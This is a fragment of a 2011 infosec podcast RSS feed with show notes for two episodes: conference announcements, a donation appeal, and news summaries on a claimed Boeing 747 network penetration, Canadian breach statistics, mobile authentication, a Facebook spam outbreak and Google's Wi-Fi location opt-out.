<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">ShmooCon 2012</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 27th-29th, 2012</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Washington Hilton Hotel, Washington, DC</span><br />
	<a href="http://www.shmoocon.org/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.shmoocon.org</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; &quot;The Reunion&quot;</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories:</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &nbsp;</span><a href="https://plus.google.com/117220625678034723010/posts/JTjn6u6uQG4"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://plus.google.com/117220625678034723010/posts/JTjn6u6uQG4</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">QUOTE: [Craig S Wright ] says: I was contracted to test the systems on a Boeing 747. They had added a new video system that ran over IP. They segregated this from the control systems using layer 2 &#8211; VLANs. We managed to break the VLANs and access other systems and with source routing could access the Engine management systems.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The response, &quot;the engine management system is out of scope.&quot;</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">For those who do not know, </span><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">747&#39;s are big flying Unix hosts.</span><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> At the time, the engine management system on this particular airline was Solaris based. The patching was well behind and they used telnet as SSH broke the menus and the budget did not extend to fixing this. </span><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The engineers could actually access the engine management system of a 747 in route. If issues are noted, they can re-tune the engine in air.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The issue here is that all that separated the engine control systems and the open network was NAT based filters. There were (and as far as I know this is true today), no extrusion controls. They filter incoming traffic, but all outgoing traffic is allowed. For those who engage in Pen Testing and know what a shoveled shell is&#8230; I need not say more.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;</span><a href="http://technology.canoe.ca/2011/11/15/18971056.html"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://technology.canoe.ca/2011/11/15/18971056.html</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Hackers attacking Canadian organizations are determined to make money in targeted campaigns while government insiders stole more data than ever before, a security study released on Tuesday showed.&nbsp;&nbsp;&nbsp; </span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The number of breaches in Canada and the cost of dealing with them have spiked since the 2008 financial crisis, according to a joint study from telecom company Telus and the University of Toronto&#39;s Rotman School of Management.&nbsp;&nbsp;&nbsp; </span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The study, its fourth annual report, said the crisis had both pressured budgets for information security and created a darker &quot;threat environment.&quot;&nbsp;&nbsp;&nbsp; </span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The average Canadian public company suffered 18 breaches in 2011, up from less than 12 breaches a year earlier, the study found. Government bodies were able to reverse the trend of increasing breaches; there were just over 17 this year after a spike above 22 last year.&nbsp;&nbsp;&nbsp; </span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">But insider breaches, where an employee deliberately accesses confidential information, spiked in the government sector despite falling in public and private companies.&nbsp;&nbsp;&nbsp; </span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Forty-two per cent of breaches in government were perpetuated by insiders, which the researchers called &quot;the most startling finding from the research.&quot; </span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Sophisticated attacks are focused on individuals and their data and often seek a continuing information stream for financial or political gain, the study said.&nbsp;&nbsp;&nbsp; </span></p>
<p>
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.infoworld.com/d/mobile-technology/ios-android-get-federal-strength-authentication-179079"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.infoworld.com/d/mobile-technology/ios-android-get-federal-strength-authentication-179079</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Good Technology and ActivIdentity today jointly announced an effort to bring federal-level authentication to Apple iOS devices, such as the iPad and iPhone, and Google Android devices. And Apperian released its Enterprise App Services Environment (EASE) product for Android devices, which lets businesses provision and manage apps, and manage content delivered to those apps. EASE can manage Android Market apps, in-house Android apps, and HTML5 apps, and also provides push notification and updates.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The Good-ActivIdentity effort seeks to bring multifactor authentication to iOS and Android devices, allowing them to work with CAC/PIV-standard smart cards and secure ID chips, as well as provide email and document encryption, cryptographic signing of emails and forms, and allow the use of public key infrastructure (PKI) authentication tools with custom applications. The companies say they intend to meet the DoD Directive 8100.2 and Homeland Security Presidential Directive 12 security standards in their joint products.<br class="kix-line-break" /><br />
	</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;</span><a href="http://www.thinq.co.uk/2011/11/15/facebook-users-hit-porn-attack-anonymous-blamed/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.thinq.co.uk/2011/11/15/facebook-users-hit-porn-attack-anonymous-blamed/</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Facebook users have been bombarded with a torrent of hardcore porn as well as violent and gory images, after an exploit has tricked users into infecting their newsfeeds.</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The outbreak began a few days ago, with users of the social network being duped into clicking on titillating images that appeared on their timelines, triggering the so-called &#39;linkspam virus&#39;.</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The disturbing images, many relating to animal abuse, are reminiscent of the infamous &#39;/b/&#39; channel on image-posting board 4Chan, the community that spawned online &#39;hacktivist&#39; collective Anonymous &#8211; leading sites such as</span><a href="http://gawker.com/5859480/facebook-is-drowning-in-a-flood-of-hardcore-porn"><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Gawker</span></a><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> to speculate that the Wikileaks-loving pranksters are behind the attack.</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">After a DDoS attack brought 4Chan down yesterday, though, the Anons may have other matters on their minds.</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Back in August, members of Anonymous had threatened an attack on Facebook timed for the 5th of November, with some sources speaking of a so-called &#39;Guy Wakes virus&#39; &#8211; though it swiftly backtracked on threats regarding so-called &#39;Operation Facebook&#39;.</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Those threats were recently re-issued, but none of the communciations were issued via the usual Anonymous press releases or recognised Twitter feeds.</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Infected Facebook users are faced with the unpleasant task of deactivating their accounts to avoid sending the shocking images to family and friends.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.cio.com/article/694077/Google_Offers_Opt_Out_for_Wi_Fi_Location_Database"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.cio.com/article/694077/Google_Offers_Opt_Out_for_Wi_Fi_Location_Database</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Google now offers a way for anyone to get out and stay out of its Wi-Fi location database, the company</span><a href="http://googleblog.blogspot.com/2011/11/greater-choice-for-wireless-access.html"><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">announced</span></a><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">. Following last year&#39;s Wi-Fi snooping scandal, Google is looking to make amends by allowing anyone to opt out from having their wireless access point included in the Google Location Server.</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">To refresh your memory, Google collects basic Wi-Fi data from network routers including Service Set Identifier (SSID) information and Media Access Control (MAC) addresses. This information is used to help the company improve the accuracy of some of its location-based products, such as Google Maps, by matching publicly broadcast information about local wireless networks with their approximate geographic location.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Google says it has explored different approaches for opting-out access points from its Location Server and thinks it found a method that has &quot;the right balance of simplicity as well as protection against abuse.&quot; The method involves modifying your wireless network name so that it ends with &quot;_nomap&quot;. So for example, if your SSID is &quot;My Network&quot;, you will need to change it to &quot;My Network_nomap&quot;.</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Once you&#39;ve changed your network name, next time a user&#39;s device sends information about your Wi-Fi access point to the Location Server, Google will note the &quot;_nomap&quot; tag and remove the access point from its records. If you need more help with changing your Wi-Fi network name, Google has this useful</span><a href="http://maps.google.com/support/bin/answer.py?hl=en&amp;answer=1725632"><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">help article</span></a><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></p>
<p>
	&nbsp;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-523-747-hacking-canada-target-fed-strength-auth-facebook-porn-opt-out/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3134/0/infosec-daily-podcast-episode-523.mp3" length="19448203" type="audio/mpeg" />
		<itunes:duration>0:40:28</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 523 for November 15, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Geordy Rostad, and Keith Pachulski.
	Announcements:
	Caption Contest. Gives us your best and worst caption or PhotoShopped [...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 523 for November 15, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Geordy Rostad, and Keith Pachulski.
	Announcements:
	Caption Contest. Gives us your best and worst caption or PhotoShopped version:
	&#160;

	
	Brad Smith (theNurse) and his stroke at Hacker Halted:
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital in a coma for a few days.
	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/
	Vote For Wim Remes
	When: Starts November 16, 2011
	Where: ISC2
	Who: CISSP&#8217;s
	http://blog.isc2.org/isc2_blog/2011/11/cast-your-vote-isc%C2%B2-board-of-directors-election-begins-nov-16-2011.html
	SANS Mentoring: Forensics 408 &#8211; Computer Forensic Essentials
	When: Starts November 30, 2011
	Where: Atlanta, GA
	Discount Code: M1011IPAD (free iPad 2)
	http://www.sans.org/mentor/details.php?nid=25504
	ShmooCon 2012
	When: January 27th-29th, 2012
	Where: Washington Hilton Hotel, Washington, DC
	http://www.shmoocon.org
	DerbyCon 2012 &#8211; &#34;The Reunion&#34;
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
	You don't have a sufficient version of Flash Player to display this animation.
	Stories:
	Source: &#160;https://plus.google.com/117220625678034723010/posts/JTjn6u6uQG4
	QUOTE: [Craig S Wright ] says: I was contracted to test the systems on a Boeing 747. They had added a new video system that ran over IP. They segregated this from the control systems using layer 2 &#8211; VLANs. We managed to break the VLANs and access other systems and with source routing could access the Engine management systems.
	The response, &#34;the engine management system is out of scope.&#34;
	For those who do not know, 747&#39;s are big flying Unix hosts. At the time, the engine management system on this particular airline was Solaris based. The patching was well behind and they used telnet as SSH broke the menus and the budget did not extend to fixing this. The engineers could actually access the engine management system of a 747 in route. If issues are noted, they can re-tune the engine in air.
	The issue here is that all that separated the engine control systems and the open network was NAT based filters. There were (and as far as I know this is true today), no extrusion controls. They filter incoming traffic, but all outgoing traffic is allowed. For those who engage in Pen Testing and know what a shoveled shell is&#8230; I need not say more.
	Source: &#160;http://technology.canoe.ca/2011/11/15/18971056.html
	Hackers attacking Canadian organizations are determined to make money in targeted campaigns while government insiders stole more data than ever before, a security study released on Tuesday showed.&#160;&#160;&#160; 
	The number of breaches in Canada and the cost of dealing with them have spiked since the 2008 financial crisis, according to a joint study from telecom company Telus and the University of Toronto&#39;s Rotman School of Management.&#160;&#160;&#160; 
	The study, its fourth annual report, said the crisis had both pressured budgets for information security and created a darker &#34;threat environment.&#34;&#160;&#160;&#160; 
	The average Canadian public company suffered 18 breaches in 2011, up from less than 12 breaches a year earlier, the study found. Government bodies were able to reverse the trend of increasing breaches; there were just over 17 this year after a spike above 22 last year.&#160;&#160;&#160; 
	But insider breaches, where an employee deliberately acces[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 522 &#8211; CC Underground, Drive Shortage, 4Chan, OS X Sandbox &amp; sweepstakesandcontestsinfo</title>
		<link>http://www.isdpodcast.com/episode-522-cc-underground-drive-shortage-4chan-os-x-sandbox-sweepstakesandcontestsinfo</link>
		<comments>http://www.isdpodcast.com/episode-522-cc-underground-drive-shortage-4chan-os-x-sandbox-sweepstakesandcontestsinfo#comments</comments>
		<pubDate>Tue, 15 Nov 2011 02:13:11 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3130</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 522 for November 14, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, Beau Woods, and Karthik Rangarajan Announcements: Caption Contest. Gives us your best and worst caption or PhotoShopped version: &#160;http://pic.twitter.com/SovbFcbE Brad Smith (theNurse) and his stroke at Hacker Halted: We all know and love Brad Smith, [...]]]></description>
			<content:encoded><![CDATA[<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 522 for November 14, 2011. &nbsp;Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, Beau Woods, and Karthik Rangarajan</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Caption Contest. Gives us your best and worst caption or PhotoShopped version: &nbsp;</span><a href="http://t.co/SovbFcbE"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://pic.twitter.com/SovbFcbE</span></a><img height="608px;" src="https://lh3.googleusercontent.com/XgYONfWjc6WmRuaN_1Sc_z6NbUvWH4ecuml-VuF-zQrM9PHughc840YbzzFI1Ow9VVjRgvUG0PZtdaQR8DY9LWWfjrkF3cEf0pjCih4v8d9hMl9-oNo" width="456px;" /></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad Smith (theNurse) and his stroke at Hacker Halted:</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital in a coma for a few days.</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p><a href="http://www.social-engineer.org/brad-smith-updates/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Vote For Wim Remes</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts November 16, 2011</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: ISC2</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Who: CISSP&rsquo;s</span><br />
	<a href="http://blog.isc2.org/isc2_blog/2011/11/cast-your-vote-isc%C2%B2-board-of-directors-election-begins-nov-16-2011.html"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blog.isc2.org/isc2_blog/2011/11/cast-your-vote-isc%C2%B2-board-of-directors-election-begins-nov-16-2011.html</span></a></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SANS Mentoring: Forensics 408 &#8211; Computer Forensic Essentials</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts November 30, 2011</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Discount Code: M1011IPAD (free iPad 2)</span><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25504"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=25504</span></a></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">ShmooCon 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 27th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Washington Hilton Hotel, Washington, DC</span><br />
	<a href="http://www.shmoocon.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.shmoocon.org</span></a></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; &quot;The Reunion&quot;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories:</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://blogs.rsa.com/aharoni/underground-forums-open-official-credit-card-stores"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blogs.rsa.com/aharoni/underground-forums-open-official-credit-card-stores</span></a></p>
